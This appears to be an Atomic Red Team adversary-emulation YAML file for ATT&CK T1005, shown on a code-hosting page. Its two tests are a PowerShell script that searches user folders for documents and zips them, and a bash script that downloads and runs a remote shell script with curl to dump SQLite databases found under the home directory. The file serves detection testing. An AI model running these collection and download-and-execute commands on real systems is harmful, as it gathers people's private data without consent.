security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
7d311f19f1394de014e2e504a5052128e63351b1
atomic-red-team/atomics/T1005/T1005.yaml
T
Atomic Red Team GUID generator bd938f584f Generate GUIDs from job=generate-docs branch=master [skip ci]
2023-11-09 04:05:54 +00:00

91 lines
3.8 KiB
YAML
Raw Blame History

attack_technique: T1005
display_name: Data from Local System
atomic_tests:
- name: Search files of interest and save them to a single zip file (Windows)
auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
description: |
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
supported_platforms:
- windows
input_arguments:
starting_directory:
description: Path to starting directory for the search
type: Path
default: C:\Users
output_zip_folder_path:
description: Path to directory for saving the generated zip file
type: Path
default: PathToAtomicsFolder\..\ExternalPayloads\T1005
file_extensions:
description: List of file extensions to be searched and zipped, separated by comma and space
type: string
default: .doc, .docx, .txt
executor:
command: |
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
cleanup_command: |
Remove-Item -Path $outputZip\data.zip -Force
name: powershell
elevation_required: false
- name: Find and dump sqlite databases (Linux)
auto_generated_guid: 00cbb875-7ae4-4cf1-b638-e543fd825300
description: |
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
dependencies:
- description: |
Check if running on a Debian based machine.
prereq_command: |
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
get_prereq_command: |
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
executor:
name: bash
elevation_required: false
command: |
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
cleanup_command: |
rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh
Reference in New Issue View Git Blame Copy Permalink